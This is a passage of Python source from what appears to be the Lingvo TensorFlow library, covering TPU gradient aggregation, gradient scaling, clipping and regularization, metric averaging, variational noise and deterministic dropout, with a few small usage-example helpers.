only every k steps in a tf.cond. Currently this works only when
skip_zero_gradients is None.
activations_grad: The gradients computed for activations.
is_activations: A boolean, whether the input is loss or activations.
tpu_embedding_activations: A `.NestedMap` of tpu embedding feature name ->
embedding feature tensor.
Returns:
Gradients to be passed back. If tpu_embedding_activations is set, their
gradients will be placed at the end.
Raises:
ValueError: upon invalid arguments.
"""
if is_activations:
assert activations_grad is not None
if not skip_zero_gradients and not is_activations:
# Scale the loss to account for the full batch size.
shards = tpu_function.get_tpu_context().number_of_shards
assert shards
loss_or_activations *= tf.constant(
1.0 / shards, dtype=loss_or_activations.dtype)
else:
assert not tpu_embedding_activations, (
'Gradient computation for tpu embedding activations requires proper '
'loss scaling, and so is not compatible with skip_zero_gradients and '
'is_activations.')
# Computes the gradients.
# Sum the grads so that we can compute statistics across the whole batch.
all_grads = ComputeGradientsSimple(
loss_or_activations=loss_or_activations,
all_vars=all_vars +
(tpu_embedding_activations if tpu_embedding_activations else []),
grad_aggregation_method=grad_aggregation_method,
colocate_gradients_with_ops=colocate_gradients_with_ops,
gate_gradients=gate_gradients,
activations_grad=activations_grad)
if tpu_embedding_activations:
# Note we don't need to aggregate TPU embedding gradients below.
tpu_embedding_grads = all_grads[len(all_vars):]
all_grads = all_grads[:len(all_vars)]
else:
tpu_embedding_grads = []
# NOTE: We can't use tpu_optimizer.CrossShardOptimizer since
# we need to scale the grads *after* the cross_replica_sum to
# match GPU version!
# TODO(cwhipkey): should we do something different here? - we could do
# some operations on the gradients before the aggregation (see comments in
# tensorflow/contrib/tpu/python/tpu/tpu_optimizer.py - see compute_gradients -
# for some more details).
aggregated_grads = []
for g in all_grads:
if g is None:
aggregated_grads.append(None)
continue
if use_bf16_gradients_ar:
g = tf.cast(g, tf.bfloat16)
with tf.ops.colocate_with(g):
if skip_zero_gradients is None:
# loss is already scaled by 1/shards.
if defer_crs_to_apply_grad:
normalized_g = tf.convert_to_tensor(g)
else:
normalized_g = tf.tpu.cross_replica_sum(g)
else:
# Compute the cross-replica mean of 'g', skipping zero gradients.
# Q(yonghui): Is there a better way to detect a non-zero gradient?
# Note(yonghui): gradient of a weight can be zero if that
# weight is not used in the forward computation, e.g. as in
# switchable layers in neural architecture search, pruned by channel
# mask, or sparsified.
if skip_zero_gradients == 'weight':
# Same shape as 'g'.
g_is_non_zero = tf.cast(tf.math.abs(g) > 1e-8, g.dtype)
elif skip_zero_gradients == 'variable':
# A variable-wide 0/1 scalar.
g_is_non_zero = tf.cast(
tf.reduce_sum(tf.math.abs(g)) > 1e-24, g.dtype)
else:
raise ValueError('Unknown skip_zero_gradients: %s' %
skip_zero_gradients)
num_updates = tf.maximum(tf.tpu.cross_replica_sum(g_is_non_zero), 1.0)
normalized_g = tf.tpu.cross_replica_sum(g) / num_updates
aggregated_grads.append(normalized_g)
return aggregated_grads + tpu_embedding_grads
class VarGrad:
"""A class that holds a variable and a gradient."""
_VAR_GRAD = py_collections.namedtuple('VarGradNamedTuple', ['var', 'grad'])
def __init__(self, *args, **kwargs):
self._var_grad = self._VAR_GRAD(*args, **kwargs)
def __getitem__(self, key):
return self._var_grad[key]
def __getattr__(self, key):
return getattr(self._var_grad, key)
def __iter__(self):
return iter(self._var_grad)
def __repr__(self):
return 'VarGrad(%r, %r)' % (self._var_grad.var, self._var_grad.grad)
def SkipNoneGradients(var_grads):
"""Removes pairs whose grad is None."""
for key, (_, g) in var_grads.FlattenItems():
if g is None:
tf.logging.info('ComputeGradients drops %s', key)
return var_grads.Filter(lambda var_grad: var_grad.grad is not None)
def ComputeGradients(
loss_or_activations,
vmap,
grad_aggregation_method=tf.AggregationMethod.EXPERIMENTAL_TREE,
colocate_gradients_with_ops=True,
gate_gradients=False,
compute_gradients_fn=None,
skip_zero_gradients=None,
use_bf16_gradients_ar=False,
skip_none_gradients=True,
defer_crs_to_apply_grad=False,
activations_grad=None,
is_activations=False,
tpu_embedding_activations=None):
"""Computes gradients of variables in vmap w.r.t loss.
Args:
loss_or_activations: either the loss, which is a scalar tensor, or
activations, which could be a tensor or a list of tensors.
vmap: A `.NestedMap` of variables.
grad_aggregation_method: Specifies the method used to combine gradient
terms. Accepted values are constants defined in the class
AggregationMethod.
colocate_gradients_with_ops: If True, try colocating gradients with the
corresponding op.
gate_gradients: If True, add a tuple around the gradients returned for an
      operation. This avoids some race conditions.
compute_gradients_fn: Function to use to compute gradients. If None, use
default. compute_gradients_fn should have the same signature as this
function, but without the last argument.
skip_zero_gradients: Whether to skip aggregating zero gradients. This helps
in case where some weights may not be used in forward computation, e.g.,
      sparsely activated networks or switchable layers in neural architecture
search. Only applicable on TPU.
Possible values are:
- None: do not skip zero gradients;
- `variable`: skip if the entire variable's gradients are almost zero;
reduce_sum(abs(grads)) < 1e-8.
- `weight`: skip if the individual weight's gradients are almost zero:
abs(grad) < 1e-8.
use_bf16_gradients_ar: Whether to use bfloat16 dtype for gradients
all-reduce. This applies to TPU only.
skip_none_gradients: Whether to skip gradients that are None.
defer_crs_to_apply_grad: Whether to defer gradient cross replica sum to
apply_gradient. This applies to TPU only.
activations_grad: The gradients computed for activations.
is_activations: A boolean, whether the input is loss or activations.
tpu_embedding_activations: A `.NestedMap` of tpu embedding feature name ->
embedding feature tensor.
Returns:
var_grad - a `.NestedMap` of VarGrad. You can view
var_grad as an ordered list of (key, (var, grad)) tuples. Every
key of var_grad exists in vmap. Every variable in vmap that
contributes to loss must exist in var_grad. Every var of var_grad
must exist in vmap. grad is the corresponding gradient computed
for var. grad is guaranteed to be not None.
If tpu_embedding_activations is set, a sub `.NestedMap` named
tpu_embedding_var_grads will be used to store the VarGrads for the
activations. In this case, key is the feature name, and var in the VarGrad
is the activation tensor (not a real variable).
"""
if not is_activations:
loss_or_activations = HasRank(loss_or_activations, 0)
if not tpu_embedding_activations:
tpu_embedding_activations = NestedMap()
assert isinstance(tpu_embedding_activations, NestedMap)
assert isinstance(vmap, NestedMap)
assert skip_zero_gradients in (None, 'variable', 'weight')
# Uniqify and remove None.
filtered_vmap = vmap.Filter(_Unique())
assert filtered_vmap is not None
# Filter out variables not contributing to 'loss_or_activations'.
# This doesn't work if the training loop is wrapped inside a tf.function,
# since all variables will be lifted out and trainable_variables will be
# empty. In that case we skip the check.
trainable_variables = set(tf.trainable_variables())
if trainable_variables:
def Needed(v):
if isinstance(v, tf.Variable):
if v not in trainable_variables:
# Skip non-trainable variables. Otherwise,
# tf.Optimizer.apply_gradients throws up an exception instead
# of skipping the update.
return False
return True
filtered_vmap = filtered_vmap.Filter(Needed)
assert filtered_vmap is not None
filtered_vlist = filtered_vmap.Flatten()
# Use caller-supplied gradient function if supplied.
if compute_gradients_fn is not None:
assert not tpu_embedding_activations
take_grad = compute_gradients_fn
else:
# tpu vs non-tpu is slightly different.
if use_tpu():
take_grad = functools.partial(
_ComputeGradientsTpu,
skip_zero_gradients=skip_zero_gradients,
use_bf16_gradients_ar=use_bf16_gradients_ar,
defer_crs_to_apply_grad=defer_crs_to_apply_grad,
activations_grad=activations_grad,
is_activations=is_activations,
tpu_embedding_activations=tpu_embedding_activations.Flatten())
else:
assert not tpu_embedding_activations
take_grad = ComputeGradientsSimple
grads = take_grad(loss_or_activations, filtered_vlist,
grad_aggregation_method, colocate_gradients_with_ops,
gate_gradients)
if tpu_embedding_activations:
tpu_embedding_grads = grads[len(filtered_vlist):]
grads = grads[:len(filtered_vlist)]
else:
tpu_embedding_grads = None
# Formulate pairs of (var, grad) and pack them into the same
# structure as filtered_vmap.
var_grads = filtered_vmap.Pack(
[VarGrad(v, g) for v, g in zip(filtered_vlist, grads)])
if skip_none_gradients:
var_grads = SkipNoneGradients(var_grads)
if tpu_embedding_grads:
# Create VarGrads for TPU embedding activations in a dedicated sub map.
assert 'tpu_embedding_var_grads' not in var_grads
tpu_embedding_activation_list = tpu_embedding_activations.Flatten()
tpu_embedding_var_grads = [
VarGrad(v, g)
for v, g in zip(tpu_embedding_activation_list, tpu_embedding_grads)
]
tpu_embedding_var_grads = tpu_embedding_activations.Pack(
tpu_embedding_var_grads)
# Replace None gradients with zeros, since TPU embedding expect all
# activations to have gradients.
def _NoneToZeros(key, var_grad):
if var_grad.grad is None:
tf.logging.warning(
f'TPU embedding gradient for feature {key} is None. Replacing with '
'zeros.')
return VarGrad(var_grad.var, tf.zeros_like(var_grad.var))
return var_grad
var_grads.tpu_embedding_var_grads = (
tpu_embedding_var_grads.TransformWithKey(_NoneToZeros))
return var_grads
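# A minimal usage sketch of ComputeGradients, assuming `loss` is a scalar tensor and
# `model_vars` is a NestedMap of trainable variables (both hypothetical). The result is
# a NestedMap of VarGrad that downstream helpers such as ApplyGradMultiplier consume.
def _ExampleComputeGradients(loss, model_vars):
  var_grads = ComputeGradients(loss, model_vars)
  # Scale every gradient by 0.5 on its variable's device.
  return ApplyGradMultiplier(var_grads, grad_scale=0.5)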
def MaskGradients(var_grad, grad_mask):
"""Computes gradients of non-masked variables in vmap w.r.t loss.
Args:
var_grad: A `.NestedMap` of (variable, gradient)
grad_mask: A dict of (variable name, mask).
Returns:
var_grad - a `.NestedMap` of (variable, mask * gradient).
"""
def ApplyMask(entry):
var, grad = entry
mask = grad_mask[var.name]
if isinstance(grad, tf.IndexedSlices):
return VarGrad(var, tf.IndexedSlices(grad.values * mask, grad.indices))
else:
return VarGrad(var, grad * mask)
return var_grad.Transform(ApplyMask)
def ApplyGradMultiplier(vs_gs, grad_scale=None):
"""Scale gradients by grad_scale on same device as corresponding variables.
Args:
vs_gs: A `.NestedMap` of VarGrad.
grad_scale: If None, each vs_gs entry has the scale. Otherwise, grad_scale
applies to every entry.
Returns:
A `.NestedMap` of (variable, gradient * grad_scale). In particular, if
grad_scale is 0, the result gradient is always 0, even if the input
gradient is inf or nan.
"""
def ScaleOrZero(var, grad, scale):
grad = CheckNumerics(grad, 'Gradient for %s is not finite.' % var.name)
return tf.where(
tf.equal(scale, 0.), tf.zeros_like(grad),
tf.cast(scale, grad.dtype) * grad)
def Scale(item):
"""Scales the gradient."""
var, grad = item
assert grad is not None, ('No grad found for ', var.name)
if grad_scale is None:
scale = item.scale
else:
scale = grad_scale
with tf.device(var.device):
if isinstance(grad, tf.IndexedSlices):
grad = tf.IndexedSlices(
ScaleOrZero(var, grad.values, scale), grad.indices,
grad.dense_shape)
else:
grad = ScaleOrZero(var, grad, scale)
return VarGrad(var, grad)
return vs_gs.Transform(Scale)
def HasNanOrInf(x):
if isinstance(x, tf.IndexedSlices):
x = x.values
with tf.device(x.device):
if x.dtype.is_complex:
return tf.reduce_any(
[HasNanOrInf(tf.math.real(x)),
HasNanOrInf(tf.math.imag(x))])
return tf.reduce_any(
tf.math.logical_or(tf.math.is_nan(x), tf.math.is_inf(x)))
def HasNanOrInfGradient(var_grads):
"""Returns a bool tensor to indicate if `var_grads` contains NaNs or Infs.
Args:
var_grads: A `.NestedMap` with (var, grad) tuple as the map value.
Returns:
A bool scalar tensor to indicate if the `var_grads` contains NaNs or Infs.
"""
return tf.reduce_any([HasNanOrInf(g) for (_, g) in var_grads.Flatten()])
def ApplyGradNormClipping(vs_gs, norm=1.0):
"""Clip gradients to norm on same device as corresponding variables.
Args:
vs_gs: A `.NestedMap` of VarGrad.
norm: Each tensor's gradient will be scaled down to have a maximum L2-norm
value of `norm`.
Returns:
A `.NestedMap` of VarGrad(variable, scaled_gradient). In particular, if
grad_scale is 0, the result gradient is always 0, even if the input
gradient is inf or nan.
"""
def ClipByNorm(var, grad, norm):
grad = CheckNumerics(grad, 'Gradient for %s is not finite.' % var.name)
return tf.clip_by_norm(grad, norm)
def Clip(item):
"""Scales the gradient."""
var, grad = item
assert grad is not None, ('No grad found for ', var.name)
with tf.device(var.device):
if isinstance(grad, tf.IndexedSlices):
grad = tf.IndexedSlices(
ClipByNorm(var, grad.values, norm), grad.indices, grad.dense_shape)
else:
grad = ClipByNorm(var, grad, norm)
return VarGrad(var, grad)
return vs_gs.Transform(Clip)
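# A minimal usage sketch combining per-tensor norm clipping with a NaN/Inf check,
# assuming `var_grads` is a NestedMap of VarGrad (hypothetical). The bool tensor can be
# used to gate the optimizer update, e.g. via tf.cond.
def _ExampleClipAndCheckGradients(var_grads):
  clipped = ApplyGradNormClipping(var_grads, norm=1.0)
  has_bad = HasNanOrInfGradient(clipped)
  return clipped, has_bad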
SKIP_LP_REGULARIZATION = '__lingvo_skip_lp_regularization'
def AdjustGradientsWithLpLoss(var_grads, lp_regularizer_weight, p=2.0):
"""Adjusts the map of (var, grad) with Lp regularization, where p=1.0 or 2.0.
Args:
var_grads: a `.NestedMap` or list of (variable, gradient).
lp_regularizer_weight: Lp regularization weight.
p: For now we support 1.0 or 2.0.
Returns:
A tuple (lp_loss, var_grads).
- lp_loss: A scalar. The lp loss.
- var_grads: a `.NestedMap` or list of (variable, gradient) regulated by Lp.
"""
# TODO(yuancao): For now we support p=1 or 2, but this can be extended to
# lp-norm in general.
assert p in [2.0, 1.0], 'For now we only support L1/L2 regularization.'
def GetVar(item):
var, grad = item
if isinstance(grad, tf.IndexedSlices):
with tf.device(var.device):
ids = HasRank(grad.indices, 1)
uniq_ids = tf.unique(ids).y
return tf.gather(var, uniq_ids)
else:
return var
def ShouldAdjust(v):
return not _VarInCollection(v, tf.get_collection(SKIP_LP_REGULARIZATION))
filtered_var_grads = [
var_grad for var_grad in Flatten(var_grads) if ShouldAdjust(var_grad.var)
]
filtered_vars = Transform(GetVar, filtered_var_grads)
for v in filtered_vars:
tf.logging.info('AdjustGradientsWithLpLoss: %s', v.name)
if p == 2.0:
lp_loss = 0.5 * lp_regularizer_weight * SumSquared(filtered_vars)
elif p == 1.0:
lp_loss = lp_regularizer_weight * SumAbs(filtered_vars)
def LpGrad(var_grad):
"""Adjusts item's grad w/ Lp loss term."""
var, grad = var_grad
if isinstance(grad, tf.IndexedSlices):
# Question(rpang): do we apply Lp loss here even if 'var' is in
# SKIP_LP_REGULARIZATION?
#
      # Note: IndexedSlices appears for embedding lookups.
      # Embedding lookup ids can contain duplicates. For duplicated ids, we
      # only want to count each id once.
with tf.device(var.device):
emb = HasRank(var, 2)
vocab_size = tf.shape(emb)[0]
ids = HasRank(grad.indices, 1)
values = tf.gather(emb, ids) # [#ids, dims]
with tf.device(grad.device):
        # counts is a vector of size vocab_size; counts[i] is the number of
        # occurrences of the i-th id in 'ids'.
counts = tf.math.unsorted_segment_sum(
tf.ones_like(ids, dtype=values.dtype), ids, vocab_size)
# Gradients for duplicated ids will be summed when they get
# applied, and hence we account for that by first dividing
# gradient resulting from lp loss by how many times the id is
# duplicated.
#
# For each id in 'ids', we know counts[id] is non-zero,
# hence, it's always safe to take reciprocal.
weights = tf.math.reciprocal(tf.gather(counts, ids))
weights = tf.expand_dims(weights, -1) # [#ids, 1]
if p == 2.0:
grad_v = values
elif p == 1.0:
grad_v = tf.sign(values)
delta = lp_regularizer_weight * weights * grad_v
grad = tf.IndexedSlices(grad.values + delta, ids)
elif not _VarInCollection(var, tf.get_collection(SKIP_LP_REGULARIZATION)):
with tf.device(var.device):
if p == 2.0:
grad_v = var
elif p == 1.0:
grad_v = tf.sign(var)
delta = lp_regularizer_weight * grad_v
with tf.device(grad.device):
grad += delta
return VarGrad(var, grad)
return lp_loss, Transform(LpGrad, var_grads)
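# A minimal usage sketch of AdjustGradientsWithLpLoss for L2 regularization, assuming
# `task_loss` is a scalar tensor and `var_grads` is a NestedMap of VarGrad (both
# hypothetical); the regularizer weight is illustrative.
def _ExampleL2Regularization(task_loss, var_grads):
  l2_loss, var_grads = AdjustGradientsWithLpLoss(
      var_grads, lp_regularizer_weight=1e-4, p=2.0)
  return task_loss + l2_loss, var_grads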
def SplitRecursively(x, num_splits, axis=-1):
"""Splits Tensors in 'x' recursively.
Args:
x: a Tensor, or a list or NestMap containing Tensors to split.
num_splits: number of splits per Tensor.
axis: the split axis.
Returns:
A list of split values of length 'num_splits'.
- If 'x' is a Tensor, a list of split Tensors.
- If 'x' is a list, a list of lists, where each sublist has the same length
as 'x' and the k'th element in each sublist corresponds to a split of the
k'th element from 'x'.
- If 'x' is a `.NestedMap`, a list of `.NestedMap`, where each field
corresponds to a split from the same field of 'x'.
"""
if isinstance(x, tf.Tensor):
return tf.split(x, num_splits, axis=axis)
elif isinstance(x, list):
splits = [SplitRecursively(element, num_splits, axis) for element in x]
splits = list(zip(*splits))
return [list(t) for t in splits]
elif isinstance(x, NestedMap):
results = [NestedMap() for _ in range(num_splits)]
for key, val in x.items():
val_splits = SplitRecursively(val, num_splits, axis)
for i in range(num_splits):
results[i][key] = val_splits[i]
return results
else:
raise TypeError('Unexpected type for SplitRecursively: %s' % type(x))
def ConcatRecursively(splits, axis=-1):
"""Concatenates tensors from 'splits'.
This is the inverse function of SplitRecursively.
Args:
splits: a list of splits to concatenate, where elements can be Tensors,
lists, or `.NestedMap`. The elements must share the same type and
structure. For example, list elements must have the same length;
`.NestedMap` must have the same set of fields.
axis: the concatenation axis.
Returns:
Concatenated data.
- If input 'splits' are Tensors, returns a concatenated Tensor.
- If input 'splits' are lists, returns a list of the same length where the
k'th element represents concatenated data of the k'th element from each
split.
- If input 'splits' are `.NestedMap`, returns a `.NestedMap` with each field
concatenated from corresponding fields of input splits.
Raises:
TypeError: if 'splits' is not a list or elements of 'splits' do not have
known or matching types.
ValueError: if 'splits' is empty or elements of 'splits' do not have
matching structures.
"""
if not isinstance(splits, list):
raise TypeError('Non-list inputs for ConcatRecursively: %s' % splits)
if not splits:
raise ValueError('Empty inputs for ConcatRecursively: %s' % splits)
tmpl = splits[0]
if isinstance(tmpl, tf.Tensor):
return tf.concat(splits, axis=axis)
elif isinstance(tmpl, list):
if not all(isinstance(split, list) for split in splits):
raise TypeError('Type mismatch for ConcatRecursively: %s' % splits)
if not all(len(split) == len(tmpl) for split in splits):
raise ValueError('Length mismatch for ConcatRecursively: %s' % splits)
return [
ConcatRecursively([split[i]
for split in splits], axis)
for i in range(len(tmpl))
]
elif isinstance(tmpl, NestedMap):
if not all(isinstance(split, NestedMap) for split in splits):
raise TypeError('Type mismatch for ConcatRecursively: %s' % splits)
results = NestedMap()
for key in tmpl:
results[key] = ConcatRecursively([split[key] for split in splits], axis)
return results
else:
raise TypeError('Unexpected type for ConcatRecursively: %s' % type(splits))
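# A minimal round-trip sketch for SplitRecursively/ConcatRecursively over a NestedMap;
# the field names and shapes below are hypothetical.
def _ExampleSplitConcatRoundTrip():
  batch = NestedMap()
  batch['ids'] = tf.zeros([8, 16], tf.int32)
  batch['paddings'] = tf.zeros([8, 16], tf.float32)
  splits = SplitRecursively(batch, num_splits=4, axis=0)  # Four NestedMaps of [2, 16].
  return ConcatRecursively(splits, axis=0)  # Same structure and shapes as `batch`.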
def WeightedAvg(values, weights, sum_reduction_fn=tf.reduce_sum, name=''):
"""Computes weighted average of values from a tensor.
Args:
values: a tensor of values
weights: a tensor of weights
sum_reduction_fn: called to reduce the values and weights to single value
name: name of metric.
Returns:
A tuple (avg, total_weight).
- avg: weighted average value
- total_weight: sum of all weights
"""
msg = 'shape of values and weights tensors must match for metric ' + name
values = with_dependencies(
[assert_equal(tf.shape(values), tf.shape(weights), message=msg)], values)
total_weight = sum_reduction_fn(weights)
# divide_no_nan only supports tf.{float,complex}*.
dtype = values.dtype if values.dtype is tf.float64 else tf.float32
avg = tf.math.divide_no_nan(
sum_reduction_fn(tf.cast(values, dtype) * tf.cast(weights, dtype)),
tf.cast(total_weight, dtype))
return tf.cast(avg, values.dtype), total_weight
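# A minimal usage sketch of WeightedAvg over per-example losses, where padded examples
# carry weight 0; `per_example_loss` and `per_example_weight` are hypothetical [batch]
# tensors of matching shape.
def _ExampleWeightedAvgLoss(per_example_loss, per_example_weight):
  avg_loss, total_weight = WeightedAvg(
      per_example_loss, per_example_weight, name='loss')
  return avg_loss, total_weight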
def WeightedAvgOfMetrics(metrics):
"""Computes the weighted average of metrics in the list.
Args:
metrics: list of dictionaries of metrics
Returns:
ret_dict - dictionary of weighted averages of each metrics.
"""
ret_dict = {}
lists_of_metrics = {}
for m in metrics:
for name, (value, weight) in m.items():
if name not in lists_of_metrics:
lists_of_metrics[name] = []
lists_of_metrics[name].append((value, weight))
for name, values_and_weights in sorted(lists_of_metrics.items()):
values = tf.stack([x[0] for x in values_and_weights])
weights = tf.stack([x[1] for x in values_and_weights])
ret_dict[name] = WeightedAvg(values, weights, tf.reduce_sum, name)
return ret_dict
def ConcatPerExampleTensors(per_example):
"""Concatenate per-example tensors from many hosts into one large block.
Args:
per_example: list of dictionaries of per-example tensors.
Returns:
ret_dict - string -> concatenated tensors.
"""
ret_dict = {}
lists_of_per_example = {}
for m in per_example:
for name, value in m.items():
if name not in lists_of_per_example:
lists_of_per_example[name] = []
lists_of_per_example[name].append(value)
for name, values in sorted(lists_of_per_example.items()):
ret_dict[name] = tf.concat(values, 0)
return ret_dict
def CombineMetrics(loss_metric_weight_pairs):
"""Combines metrics from `loss_metric_weight_pairs` according to weights.
Keys must either exist in all metrics, in which it will be processed as a
weighted sum, or exist in only one metrics, in which case it will be copied.
Args:
loss_metric_weight_pairs: a list of (metrics, weight) pairs, where each
weight is a float and each metrics is a dict with str keys and
(metric_value, target_weight) values.
Returns:
A dict with the same set of keys as input metrics and values of
(weighted_sum(metric_value), weighted_sum(target_weight)).
Raises:
ValueError: if there exists a metric that exists in more than one element
of `loss_metric_weight_pairs` but not in all of them.
"""
all_keys = set(
[k for loss_metrics, _ in loss_metric_weight_pairs for k in loss_metrics]) # pylint: disable=g-complex-comprehension
result = {}
for k in all_keys:
count = 0
for loss_metrics, weight in loss_metric_weight_pairs:
if k in loss_metrics:
count += 1
if count > 1 and count != len(loss_metric_weight_pairs):
      raise ValueError('Found metric %s which exists in more than one '
'but not all loss metrics.' % k)
total_val = 0
total_target_weight = 0
for loss_metrics, weight in loss_metric_weight_pairs:
if k in loss_metrics:
val, target_weight = loss_metrics[k]
if count == 1:
# Single metric, don't multiply by weight.
total_val = val * target_weight
total_target_weight = target_weight
else:
# Total weighted sum of all predictions.
total_val += weight * val * target_weight
total_target_weight += weight * target_weight
result[k] = (total_val / total_target_weight, total_target_weight)
return result
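# A minimal usage sketch of CombineMetrics with two hypothetical metric dicts, each
# mapping a name to (value, weight); shared keys become weighted sums, while keys
# present in only one dict are copied through.
def _ExampleCombineMetrics(train_metrics, aux_metrics):
  return CombineMetrics([(train_metrics, 0.7), (aux_metrics, 0.3)])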
def AddVN(p, x, per_step=False):
"""Add variational noise to x.
Args:
p: Layer params, with a `vn` subparam containing `VariationalNoiseParams`.
x: Input to add variational noise to.
per_step: Whether to add per_step noise.
Returns:
The input with variational noise added according to params.
"""
if per_step:
if not p.vn.per_step_vn:
return x
else:
if not p.vn.global_vn:
return x
if p.vn.scale is None:
raise ValueError('VN scale must be set.')
if p.vn.deterministic:
seeds = GenerateStepSeedPair(p, GetGlobalStep())
global_step_seed = seeds[0]
op_seed = seeds[1]
if not p.vn.per_step_vn:
global_step_seed = tf.zeros_like(global_step_seed)
if p.vn.seed:
op_seed = tf.convert_to_tensor(p.vn.seed, dtype=op_seed.dtype)
noises = DeterministicVN(
p,
tf.stack([global_step_seed, op_seed]),
tf.shape(x),
mean=0.0,
std=1.0)
noises = tf.cast(noises, x.dtype)
else:
seed = p.vn.seed
if seed and p.vn.per_step_vn:
# TODO(b/171767456): Fix per_step_vn.
# seed += GetGlobalStep() * 203984
pass
noises = tf.random.normal(tf.shape(x), stddev=1.0, seed=seed, dtype=x.dtype)
scale = tf.where(GetGlobalStep() >= p.vn.start_step, p.vn.scale, 0.0)
return x + tf.cast(scale, x.dtype) * noises
def VariationalNoiseParams(scale,
global_vn=False,
per_step_vn=False,
seed=None,
deterministic=True,
start_step=0):
"""Returns a hyperparams for variational noise."""
p = hyperparams.Params()
p.Define(
'scale', scale,
      'Std of the variational noise to apply. This can be a scalar,'
' or a scalar tensor.')
p.Define('global_vn', global_vn,
           'Adds global variational noise every training step iff True.')
p.Define('per_step_vn', per_step_vn,
           'Adds per-timestep variational noise iff True.')
p.Define('seed', seed, 'Random seed used to generate noise.')
p.Define(
      'deterministic', deterministic, 'If true, generate noise using '
'stateless random ops that are compatible with TF functional ops.')
p.Define(
'start_step', start_step,
'Step starting from which variational noise is added during training.')
return p
def DefaultVN():
return VariationalNoiseParams(scale=None)
# To disable VN of a layer, we use 1.0 in the first input parameter
# of the following function because otherwise it is the same as DefaultVN(),
# which will be updated by the parent configuration in CopyBaseParams().
def DisableVN():
return VariationalNoiseParams(1.0, False, False)
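# A minimal usage sketch of enabling global variational noise, assuming `p` is a layer's
# hyperparams (with `vn`, `random_seed` and `is_inference` fields) and `x` is an
# activation tensor; the scale and seed values are hypothetical.
def _ExampleAddGlobalVN(p, x):
  p.vn = VariationalNoiseParams(scale=0.075, global_vn=True, seed=1234)
  return AddVN(p, x)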
# Step seed keyed by graph.
_STEP_SEED_DICT = ThreadLocalDict()
# The step seed will increment by np.prod(_STEP_SEED_INCREMENT.stack)
_STEP_SEED_INCREMENT = ThreadLocalStack()
@contextlib.contextmanager
def StepSeedIncrementContext(step):
"""Adds an element to _STEP_SEED_INCREMENT."""
assert step > 0, ('%s' % step)
_STEP_SEED_INCREMENT.stack.append(step)
try:
yield
finally:
_STEP_SEED_INCREMENT.stack.pop()
def GetStepSeed():
"""Gets step_seed."""
key = id(tf.get_default_graph())
if key not in _STEP_SEED_DICT.dict:
ResetStepSeed()
return _STEP_SEED_DICT.dict[key]
def ResetStepSeed(seed=0):
"""Resets step_seed to specified value."""
key = id(tf.get_default_graph())
_STEP_SEED_DICT.dict[key] = tf.convert_to_tensor(seed, dtype=tf.int64)
def MaybeResetStepSeedFromScope():
"""In graph mode, resets step_seed according to the current named scope.
This is used in graph mode to avoid "tensor is from a different graph"
  errors that happen when we share random seed tensors too much.
See b/129159299 for more context.
Eager mode does not have this problem, so in eager mode we do nothing.
"""
if not tf.executing_eagerly():
ResetStepSeed(GenerateSeedFromName(tf.no_op(name='new_step_seed').name))
def MaybeResetStepSeed(seed):
"""If we're in graph mode, reset the step seed."""
if not tf.executing_eagerly():
ResetStepSeed(seed)
def GetIncStepSeed():
"""Returns and increments the step_seed."""
step_seed = GetStepSeed()
# TODO(lepikhin): introduce a routine filling a queue of uint32 random seeds
# independent of underlying PRNG used by tensorflow.
inc = np.prod(_STEP_SEED_INCREMENT.stack)
ResetStepSeed(step_seed + inc)
return step_seed
def GenerateStepSeedPair(p, op_seed=None):
"""Generates a seed pair for deterministic random operations in ...
functional loops.
This function retrieves a unique seed pair on each call, based off the current
global step and step seed. The step seed ensures this function returns a
unique seed pair on each call: calling this function automatically increments
the step seed. The step seed is automatically reset at the beginning of each
global step in the model's FProp and works transparently through recurrent.py.
Args:
p: A hyperparams.Params object, containing keys 'random_seed' and
'is_inference'.
op_seed: An additional operation-level seed to apply.
Returns:
A size 2 tensor of op seeds to use for stateless_random ops.
"""
seed_dtype = tf.int32 if use_tpu() else tf.int64
if p.is_inference and p.random_seed is None:
# Ensure GetIncStepSeed is called even inside the shortcut.
# This ensures if p.random_seed is set for other ops that use this function
# that they will get the same seed pair whether or not p.random_seed is set
# for this specific call.
GetIncStepSeed()
# Unlike tf.random*, stateless random ops are completely determined by the
# passed-in seeds. This means at inference time the same inputs will produce
# the same outputs, even if the model is supposed to have randomness such as
# dropout during inference. We inject additional randomness only during
# inference if the graph is exported with random_seed=None as a workaround.
return tf.random.uniform([2], maxval=seed_dtype.max, dtype=seed_dtype)
global_step = tf.cast(GetGlobalStep(), seed_dtype)
step_seed = tf.cast(GetIncStepSeed(), seed_dtype)
seeds = tf.stack([global_step, step_seed])
if p.random_seed is not None:
seeds += p.random_seed
if op_seed is not None:
op_seed = tf.cast(op_seed, seed_dtype)
seeds += op_seed
return seeds
def DeterministicDropout(x, keep_prob, seeds, noise_shape=None, name=None):
"""Similar to `tf.nn.dropout()`, but fully deterministic.
Args:
x: A float Tensor on which to apply dropout.
keep_prob: A scalar `Tensor` of keep probability.
seeds: A Tensor of shape [2]. 2 seeds for deterministic random number
generator.
noise_shape: A 1-D `Tensor` of type `int32`, representing the shape for
randomly generated keep/drop flags.
name: An optional name for this operation.
Returns:
A Tensor with the same shape as `x`.
Raises:
InvalidArgumentError: if keep_prob is invalid.
"""
if isinstance(keep_prob, numbers.Real):
if keep_prob <= 0 or keep_prob > 1:
raise tf.errors.InvalidArgumentError(
'keep_prob must be in range (0, 1]. Value: {}'.format(keep_prob))
if keep_prob == 1:
return x
with tf.name_scope(name, 'dropout', [x]) as name:
if use_tpu():
seeds = tf.cast(seeds, tf.int32)
keep_prob = tf.convert_to_tensor(
keep_prob, dtype=tf.float32, name='keep_prob')
# uniform in [keep_prob, 1.0 + keep_prob)
# StatelessRandomUniform op does not support non-float (e.g. bfloat16) dtype
# and non-int32 seed types.
noise_shape = noise_shape or GetShape(x)
random_tensor = keep_prob + tf.random.stateless_uniform(
noise_shape, seed=seeds, dtype=tf.float32)
# 0. if [keep_prob, 1.0) and 1. if [1.0, 1.0 + keep_prob)
binary_tensor = tf.floor(random_tensor)
if x.dtype != tf.float32:
binary_tensor = tf.cast(binary_tensor, x.dtype)
keep_prob = tf.cast(keep_prob, dtype=x.dtype)
result = tf.div(x, keep_prob) * binary_tensor
result.set_shape(x.get_shape())
return result
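# A minimal usage sketch of deterministic dropout inside a layer, assuming `p` is a
# layer's hyperparams (with `random_seed` and `is_inference`) and `x` is an activation
# tensor; the keep probability is illustrative.
def _ExampleDeterministicDropout(p, x):
  seeds = GenerateStepSeedPair(p)
  return DeterministicDropout(x, keep_prob=0.9, seeds=seeds)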
def DeterministicVN(params, seeds, noise_shape, mean=0.0, std=1.0, name=None):
"""Produces Fully deterministic Gaussian noise from shape, mean and std.
Args:
params: Nested map of params.
